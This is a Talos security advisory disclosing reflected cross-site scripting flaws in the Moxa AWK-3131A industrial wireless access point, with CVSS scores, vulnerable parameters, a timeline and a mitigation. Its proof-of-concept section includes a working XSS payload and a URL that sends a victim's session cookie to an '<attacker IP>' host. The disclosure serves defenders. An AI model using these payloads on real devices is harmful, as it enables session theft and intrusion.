Lucene search

K
talosTalos IntelligenceTALOS-2016-0233
HistoryApr 10, 2017 - 12:00 a.m.

Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities

2017-04-1000:00:00
Talos Intelligence
www.talosintelligence.com
16

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.5%

Summary

An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

<http://www.moxa.com/product/AWK-3131A.htm&gt;

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

An exploitable Reflected Cross-Site Scripting (XSS) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

The following parameters have been validated as being vulnerable to XSS exploitation: - devIndex parameter in client_list.asp - devIndex parameter in multiple_ssid_set.asp - index parameter in wireless_cert.asp - vapIndex parameter in wireless_security.asp

In testing, it was possible to inject JavaScript which allowed an attacker to steal legitimate session tokens, allowing the attacker to impersonate an authenticated user.

Exploit Proof-of-Concept

Basic PoC In multiple_ssid_set.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f

";alert(1)%2f%2f

Stealing Session Tokens The URL below will send an authenticated user’s valid session token to the attacker:

http://&lt;device IP&gt;//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://&lt;attacker IP&gt;/test?cookie=%22.concat%28document.cookie%29%3C/script%3E

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.

Timeline

2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.5%